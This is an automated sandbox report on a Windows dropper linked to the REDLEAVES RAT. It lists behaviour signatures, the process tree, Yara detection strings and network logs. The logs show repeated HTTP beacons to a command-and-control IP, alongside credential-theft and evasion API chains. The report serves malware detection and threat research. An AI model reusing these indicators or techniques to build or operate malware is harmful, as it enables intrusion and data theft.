Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cANdLlHS4N

Overview

General Information

Sample Name:cANdLlHS4N (renamed file extension from none to exe)
Analysis ID:586425
MD5:b3139b26a2dabb9b6e728884d8fa8b33
SHA1:de5672c7940e4fad3c8145ce9e8a5fcb1da0fcee
SHA256:5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Submitted sample is a known malware sample
Writes to foreign memory regions
Contains functionality to start reverse TCP shell (cmd.exe)
Connects to many ports of the same IP (likely port scanning)
Allocates memory in foreign processes
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Stores files to the Windows start menu directory
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Creates a start menu entry (Start Menu\Programs\Startup)
Potential key logger detected (key state polling based)
Detected non-DNS traffic on DNS port
Queries keyboard layouts
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to detect sandboxes (mouse cursor move detection)
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • cANdLlHS4N.exe (PID: 6048 cmdline: "C:\Users\user\Desktop\cANdLlHS4N.exe" MD5: B3139B26A2DABB9B6E728884D8FA8B33)
    • obedience.exe (PID: 488 cmdline: C:\Users\user\AppData\Local\Temp\obedience.exe MD5: 6A1C14D5F16A07BEF55943134FE618C0)
      • iexplore.exe (PID: 5844 cmdline: C:\Program Files (x86)\Internet Explorer\iexplore.exe MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • obedience.exe (PID: 5080 cmdline: "C:\Users\user\AppData\Local\Temp\obedience.exe" MD5: 6A1C14D5F16A07BEF55943134FE618C0)
    • iexplore.exe (PID: 244 cmdline: C:\Program Files (x86)\Internet Explorer\iexplore.exe MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
cANdLlHS4N.exeDropper_DeploysMalwareViaSideLoadingDetect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugXUSG
  • 0x135bf2:$UniqueString: 2E 6C 6E 6B 00 00 5C 00 00 00 61 76 70 75 69 2E 65 78 65
  • 0x30f9:$PsuedoRandomStringGenerator: B9 1A 00 00 00 F7 F9 46 80 C2 41 88 54 35 8B 83 FE 64

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\handkerchief.datREDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchiefDetect obfuscated .dat file containing shellcode and core REDLEAVES RATUSG
  • 0x38a81:$RedleavesStringObfu: 73 64 65 5E 60 74 75 74 6C 6F 60 6D 5E 6D 64 60 77 64 72 5E 65 6D 6D 6C 60 68 6F 2F 65 6D 6D
C:\Users\user\AppData\Local\Temp\handkerchief.datSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x14c7:$xo1: Osrh;kit|izv;xzuuto;y~;inu;ru;_TH;vt\x7F~
C:\Users\user\AppData\Local\Temp\StarBurn.dllREDLEAVES_DroppedFile_ImplantLoader_StarburnDetect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RATUSG
  • 0x11d0:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C F3 EB 12 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
C:\Users\user\AppData\Local\Temp\StarBurn.dllOpCloudHopper_Malware_6Detects malware from Operation Cloud HopperFlorian Roth
  • 0x17d3c:$s4: SOFTWARE\EGGORG

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.246163618.0000000002710000.00000004.00000800.00020000.00000000.sdmpREDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchiefDetect obfuscated .dat file containing shellcode and core REDLEAVES RATUSG
  • 0x38a81:$RedleavesStringObfu: 73 64 65 5E 60 74 75 74 6C 6F 60 6D 5E 6D 64 60 77 64 72 5E 65 6D 6D 6C 60 68 6F 2F 65 6D 6D
00000000.00000002.246163618.0000000002710000.00000004.00000800.00020000.00000000.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x14c7:$xo1: Osrh;kit|izv;xzuuto;y~;inu;ru;_TH;vt\x7F~
00000003.00000002.273655894.000000006EE51000.00000020.00000001.01000000.00000005.sdmpREDLEAVES_DroppedFile_ImplantLoader_StarburnDetect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RATUSG
  • 0xdd0:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C F3 EB 12 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmpREDLEAVES_DroppedFile_ImplantLoader_StarburnDetect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RATUSG
  • 0xdd0:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C F3 EB 12 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
00000000.00000000.235573187.0000000000CA2000.00000008.00000001.01000000.00000003.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x6c46:$xo1: 6\x0A\x0B\x11B\x12\x10\x0D\x05\x10\x03\x0FB\x01\x03\x0C\x0C\x0D\x16B\x07B\x10\x17\x0CB\x0B\x0CB&-1B\x0F\x0D\x06\x07
  • 0x28ccf:$xo1: Mqpj9ikv~kxt9zxwwvm9{|9klw9pw9]VJ9tv}|
Click to see the 37 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
0.2.cANdLlHS4N.exe.ca8bf8.1.unpackREDLEAVES_DroppedFile_ImplantLoader_StarburnDetect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RATUSG
  • 0x5d0:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C F3 EB 12 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
0.2.cANdLlHS4N.exe.ca8bf8.1.unpackOpCloudHopper_Malware_6Detects malware from Operation Cloud HopperFlorian Roth
  • 0x16b3c:$s4: SOFTWARE\EGGORG
0.2.cANdLlHS4N.exe.26e0000.2.raw.unpackREDLEAVES_DroppedFile_ImplantLoader_StarburnDetect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RATUSG
  • 0x11d0:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C F3 EB 12 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
0.2.cANdLlHS4N.exe.26e0000.2.raw.unpackOpCloudHopper_Malware_6Detects malware from Operation Cloud HopperFlorian Roth
  • 0x17d3c:$s4: SOFTWARE\EGGORG
0.2.cANdLlHS4N.exe.26e0000.2.unpackREDLEAVES_DroppedFile_ImplantLoader_StarburnDetect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RATUSG
  • 0x5d0:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C F3 EB 12 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
Click to see the 11 entries

Sigma Signatures

There are no malicious signatures, click here to show all signatures.

Source: Process startedAuthor: frack113: Data: Command: C:\Users\user\AppData\Local\Temp\obedience.exe, CommandLine: C:\Users\user\AppData\Local\Temp\obedience.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\obedience.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\obedience.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\obedience.exe, ParentCommandLine: "C:\Users\user\Desktop\cANdLlHS4N.exe" , ParentImage: C:\Users\user\Desktop\cANdLlHS4N.exe, ParentProcessId: 6048, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\obedience.exe, ProcessId: 488

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: cANdLlHS4N.exeVirustotal: Detection: 77%Perma Link
Source: cANdLlHS4N.exeMetadefender: Detection: 64%Perma Link
Source: cANdLlHS4N.exeReversingLabs: Detection: 84%
Antivirus / Scanner detection for submitted sample
Source: cANdLlHS4N.exeAvira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\StarBurn.dllAvira: detection malicious, Label: HEUR/AGEN.1226539
Source: 0.2.cANdLlHS4N.exe.2880000.3.unpackAvira: Label: TR/ATRAPS.Gen
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B4B9B9 CredEnumerateA,WideCharToMultiByte,GetACP,WideCharToMultiByte,CryptUnprotectData,GetACP,WideCharToMultiByte,CredFree,2_2_04B4B9B9
Source: cANdLlHS4N.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: cANdLlHS4N.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_009C8B98 __EH_prolog3_GS,GetFullPathNameA,__cftof,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,_strcpy_s,0_2_009C8B98
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00409798 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,1_2_00409798
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00405F34 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,1_2_00405F34
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B4B33C FindFirstFileW,FindClose,2_2_04B4B33C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_00409798 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,3_2_00409798
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_00405F34 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_00405F34
Source: C:\Users\user\AppData\Local\Temp\obedience.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

Networking

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: TrafficSnort IDS: 2024173 ET TROJAN Red Leaves magic packet detected (APT10 implant) 192.168.2.4:49764 -> 67.205.132.17:80
Connects to many ports of the same IP (likely port scanning)
Source: global trafficTCP traffic: 67.205.132.17 ports 3,443,4,995,80,53
Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: global trafficHTTP traffic detected: POST /NEZTl2/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /NEZTl2/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /NEZTl2/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /NEZTl2/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /NEZTl2/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /3T3t/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /3T3t/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /3T3t/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /3T3t/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /3T3t/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /hvnqlRD8z/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /hvnqlRD8z/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /hvnqlRD8z/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /hvnqlRD8z/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /hvnqlRD8z/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /23I9/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /23I9/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /23I9/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /23I9/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /23I9/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /M2c1Nb/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /M2c1Nb/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /M2c1Nb/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /M2c1Nb/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficHTTP traffic detected: POST /M2c1Nb/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: global trafficTCP traffic: 192.168.2.4:49757 -> 67.205.132.17:995
Source: global trafficTCP traffic: 192.168.2.4:49746 -> 67.205.132.17:53
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 144.168.45.116
Source: unknownTCP traffic detected without corresponding DNS query: 144.168.45.116
Source: unknownTCP traffic detected without corresponding DNS query: 144.168.45.116
Source: unknownTCP traffic detected without corresponding DNS query: 144.168.45.116
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknownTCP traffic detected without corresponding DNS query: 144.168.45.116
Source: unknownTCP traffic detected without corresponding DNS query: 144.168.45.116
Source: iexplore.exe, 00000002.00000002.500224676.0000000004C70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://67.205.132.17:443
Source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.drString found in binary or memory: http://crl.globalsign.net/Timestamping1.crl0
Source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0N
Source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.drString found in binary or memory: http://crl.globalsign.net/root.crl0
Source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.drString found in binary or memory: http://secure.globalsign.net/cacert/ObjectSign.crt09
Source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.drString found in binary or memory: http://secure.globalsign.net/cacert/PrimObject.crt0
Source: cANdLlHS4N.exe, 00000000.00000002.246215033.0000000002880000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp, obedience.exe, 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp, obedience.exe, 00000003.00000000.262529824.0000000000496000.00000002.00000001.01000000.00000004.sdmp, obedience.exe.0.drString found in binary or memory: http://www.audio-tool.net
Source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.drString found in binary or memory: http://www.globalsign.net/repository/0
Source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.drString found in binary or memory: http://www.globalsign.net/repository/03
Source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.drString found in binary or memory: http://www.globalsign.net/repository09
Source: unknownHTTP traffic detected: POST /NEZTl2/index.php HTTP/1.1Connection: Keep-AliveAccept: */*Content-Length: 133Host: 67.205.132.17:443
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B43A47 recv,recv,2_2_04B43A47
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00429A00 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,1_2_00429A00
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B55315 GetDesktopWindow,GetDC,GetDC,GetDC,CreateCompatibleDC,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,ReleaseDC,ReleaseDC,GetClientRect,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,StretchBlt,DeleteObject,DeleteObject,CreateCompatibleBitmap,SelectObject,BitBlt,GetObjectW,GlobalAlloc,GlobalFix,GetDIBits,VirtualAlloc,GlobalUnWire,GlobalFree,VirtualFree,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,ReleaseDC,ReleaseDC,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,ReleaseDC,ReleaseDC,2_2_04B55315
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_009AD29D GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_009AD29D
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_009A7B6A SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,0_2_009A7B6A
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00445BB4 GetKeyboardState,1_2_00445BB4
